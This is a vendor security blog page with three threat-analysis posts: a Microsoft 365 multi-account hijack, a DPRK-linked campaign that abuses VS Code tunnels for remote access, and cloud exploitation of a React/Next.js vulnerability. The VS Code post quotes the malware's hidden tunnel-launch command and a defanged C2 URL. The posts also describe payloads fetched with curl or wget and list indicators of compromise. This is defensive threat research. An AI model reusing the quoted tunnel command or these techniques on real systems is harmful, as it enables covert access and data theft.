Blog
/
Identity
/
June 9, 2021

Multi-Account Hijack Detection with AI

Discover the analysis of a sophisticated SaaS-based attack using Microsoft 365 accounts. Learn how attackers launch & maintain their offensive strategies.
Written by
Max Heinemeyer
Global Field CISO
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
09
Jun 2021

The widespread and rapid adoption of Software-as-a-Service (SaaS) has opened up a breadth of security risks for IT teams. Unlike commercial off-the-shelf (COTS) software, SaaS security tends to be managed by third-party vendors rather than the end customer. Security teams therefore struggle with reduced visibility and control over these environments, and cyber-criminals have been quick to take advantage, launching a wave of cloud-based attacks, from Vendor Email Compromise to internal account hijacks.

Attackers often gain access to multiple accounts on the same domain, enabling them to attack from multiple angles, for example sending of hundreds of emails from one account, while maintaining persistence with another. This gives the hacker an opportunity to try multiple attack vectors, using tools native to the SaaS environment as well as external payloads.

While preventative controls such as Multi-Factor Authentication (MFA) provide an extra layer of protection, there are many techniques available to circumvent zero-trust approaches. Remote and flexible working is set to continue to varying degrees across many different regions and industries, so companies must now commit to securing their cloud architecture and developing proactive cyber security measures.

In this blog, we will analyze a persistent cyber-attack which targeted a real estate company in Europe and leveraged several compromised Microsoft 365 accounts. These SaaS takeovers are quickly becoming the new norm, but they are still misunderstood and poorly documented in the wider industry. Cyber AI detected every stage of this intrusion in real time, without the use of signatures or static rules.

A and B: Hijacking Microsoft 365 accounts

The organization had around 5,000 devices in its environment, with 1,000 active SaaS accounts. The timeline below shows how the threat actor leveraged the SaaS accounts of five different users to carry out the operation, as well as exploiting several other accounts on the final day.

Figure 1: Diagram of the infection chain, which occurred over three days. On the fourth day, the attacker tried again but was unsuccessful.

The actor initially compromised at least two SaaS credentials – which we’ll refer to here simply as ‘account A’ and ‘account B’ – and logged in from several unusual geographical locations, presumably using a VPN. Darktrace detected this as unusual login events for the SaaS accounts.

In account A, the attacker was observed previewing files likely to contain customer information, but did not perform any other follow-up activity. In account B, they set a new inbox rule three hours after the initial compromise, resulting in a high-severity alert.

At around this time, the threat actor sent a number of phishing emails from account B: emails that appeared to be sharing a harmless and legitimate-looking folder on OneDrive. The link probably led to a fake Microsoft login page, similar to the below, which could have recorded the victims’ credentials and sent them directly back to the attacker.

Figure 2: A seemingly legitimate Microsoft login page.

The phishing attempt was detected by Antigena Email, Darktrace’s email security technology. Antigena was in passive mode at the time, and so was not configured to take action on these threatening emails. But taking into account the highly anomalous sender surge coupled with the unusual login locations, it would have autonomously intercepted all the emails, reducing the impact of the attack.

The attacker was subsequently locked out of account B. After this, they tried (and failed) to use a legacy user agent to bypass any MFA which may have been enforced on the account. Darktrace detected this as a suspicious login and blocked the attempt.

Accounts C, D and E: The threat develops

The next day, the actor logged into a new account (account C) from the same autonomous system number (ASN), indicating that the account had been infected by the OneDrive phishing emails. In other words, the attacker had leveraged account B to compromise new users in the organization and ensure multiple points of intrusion.

Darktrace detected each stage of this, piecing together the different events into one meaningful security narrative.

Figure 3: Anomalous activity from accounts C, D, and E.

Account C was then used to preview a file likely containing contact information.

After being locked out of account C when trying to log in the next day, the hacker worked their way through two more accounts (account D and account E), which they had hijacked in the previous phishing attempts. They were locked out each time after generating alerts due to the unusual logins and new inbox rules created around the same time.

A to Z: End of the line

Running out of options, the attacker decided to go back to account A and set a new inbox rule, using it to send new phishing emails with a link to a non-Microsoft cloud storage domain (Tresorit). Again, Darktrace recognized this as highly unusual behavior, and the hacker was promptly locked out of the account.

During this burst of activity, Darktrace also observed a Microsoft Teams session from one of the suspicious ASNs. This was likely a social engineering attempt and another possible attack vector. Microsoft Teams could have been leveraged to share a malicious link over instant message, extract sensitive information, or send spam internally and externally on the chat function.

The threat actor could have then used this to pivot across various applications and accounts, assuming that the company had a siloed security approach – with different tools for cloud, SaaS, email, and endpoint – and so could not pick up on the malicious cross-platform movement.

On the following day, the attacker attempted logins on multiple accounts again, but with no success. Cyber AI had pinpointed all the anomalous activity – no matter where it originated – and alerted the security team immediately.

SaaS attack under the microscope

Multi-account compromises can be incredibly persistent and are difficult for traditional security tools to identify. The hacker used several tactics to circumvent the customer’s existing email security products:

  1. The initial use of two compromised credentials – account A and account B – allowed the hacker to stay under the radar and not raise too much suspicion on a single account. Account A was kept quiet until other avenues had been exhausted.
  2. Activity was generated from multiple ASNs in at least three different geographical locations, probably utilizing a VPN: one in Africa where much of the activity originated, and two in North America, including some widely used ASNs which were highly unusual for the customer.
  3. The attacker entirely used Microsoft services until the final emails, choosing to ‘live off the land’ rather than sending links that may have been caught by gateways.
  4. The attacker logged into Microsoft Teams in their final movements – a fairly benign-looking event which could have been used to compromise more accounts and move laterally, and would have gone undetected.

Darktrace identified every stage of the attack – including spotting the anomalous ASNs – and launched an automatic, in-depth investigation with Cyber AI Analyst. The organization was thus able to take action before the damage was done.

Figure 4: Darktrace’s SaaS console gives a clear overview of activity across all different applications.

ABCs of SaaS security

The approach of using various accounts to mount the offensive, while keeping one to maintain persistence, prolonged this intrusion. Such tactics will likely be seen again in the near future.

Tracking the number of factors involved in an attack with multiple credentials, multiple attack vectors, and multiple attacker-IPs, is a serious challenge. In these situations, it is essential to have a security solution which can detect activity across different applications, forming a unified and holistic understanding over the entire digital enterprise.

While not active in this case, Antigena SaaS would have taken autonomous action and prevented the threat from escalating by enforcing normal behavior, stopping the hacker from logging in from malicious infrastructure or performing any out-of-character SaaS actions, such as creating new inbox rules.

Following the intrusion, the company decided to adopt Antigena SaaS, which now mitigates their cloud security risks and guards against sensitive data loss and reputational damage.

Thanks to Darktrace analyst Daniel Gentle for his insights on the above threat find.

Darktrace model detections:

  • SaaS / Compromise / Unusual Login and New Email Rule
  • SaaS / Compliance / New Email Rule
  • SaaS / Unusual Activity / Unusual External Source for SaaS Credential Use
  • SaaS / Access / Suspicious Login Attempt
  • Antigena Email: Unusual Login Location + Sender Surge

Written by
Max Heinemeyer
Global Field CISO
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
The 17% of email threats SEGs miss – and how Darktrace catches them
Dec 4, 2025
3
Darktrace Named as a Leader in 2025 Gartner® Magic Quadrant™ for Email Security Platforms
Dec 3, 2025
4
From Amazon to Louis Vuitton: How Darktrace Detects Black Friday Phishing Attacks
Nov 27, 2025
5
Pre-CVE Threat Detection: 10 Examples Identifying Malicious Activity Prior to Public Disclosure of a Vulnerability
Jul 2, 2025

More in this series

No items found.
Continue reading
Identity
August 21, 2025

From VPS to Phishing: How Darktrace Uncovered SaaS Hijacks through Virtual Infrastructure Abuse

Darktrace identified coordinated SaaS account compromises across multiple customer environments. The incidents involved suspicious logins from VPS-linked infrastructure followed by unauthorized inbox rule creation and deletion of phishing-related emails. These consistent behaviors across devices point to a targeted phishing campaign leveraging virtual infrastructure for access and concealment. Discover how Darktrace uncovered this activity and what it means for the future of SaaS security.
Rajendra Rushanth
Cyber Analyst
Read more
Identity
July 8, 2025

Defending the Cloud: Stopping Cyber Threats in Azure and AWS with Darktrace

This blog examines three real-world cloud-based attacks in Azure and AWS environments, including credential compromise, data exfiltration, and ransomware detonation. Learn how Darktrace’s AI-driven threat detection and Autonomous Response capabilities help organizations defend against evolving threats in complex cloud environments.
Alexandra Sentenac
Cyber Analyst
Read more
Identity
July 3, 2025

Top Eight Threats to SaaS Security and How to Combat Them

SaaS security requires new methods to keep up with evolving threats and business infrastructure. In this blog, learn the top eight threats to identity security and how AI-based solutions can help.
Carlos Gray
Senior Product Marketing Manager, Email
Read more

Blog

/

Network

/

January 23, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to hxxps://www[.]yespp[.]co[.]kr/common/include/code/out[.]php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author

Blog

/

Cloud

/

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI